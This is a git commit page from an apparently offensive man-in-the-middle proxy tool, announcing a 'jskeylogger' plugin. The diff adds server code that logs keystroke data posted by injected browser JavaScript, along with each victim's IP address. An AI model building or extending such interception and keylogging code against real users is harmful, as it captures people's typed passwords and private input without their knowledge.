Minor fixes and jskeylogger plugin now live

This commit is contained in:
byt3bl33d3r 2014-07-11 10:31:49 +02:00
parent 4b92f26b96
commit be7639efd5
6 changed files with 70 additions and 21 deletions

View file

@ -78,6 +78,8 @@ class ServerConnection(HTTPClient):
if 'clientprfl' in self.uri:
out = pformat(self.post2dict(self.postData))
logging.warning("Browser Profilerer data from " + str(self.client.getClientIP()) + ":\n" + out)
elif 'keylog' in self.uri:
logging.warning("JS Keylogger data from " + str(self.client.getClientIP()) + ":\n" + self.postData)
else:
logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))
self.transport.write(self.postData)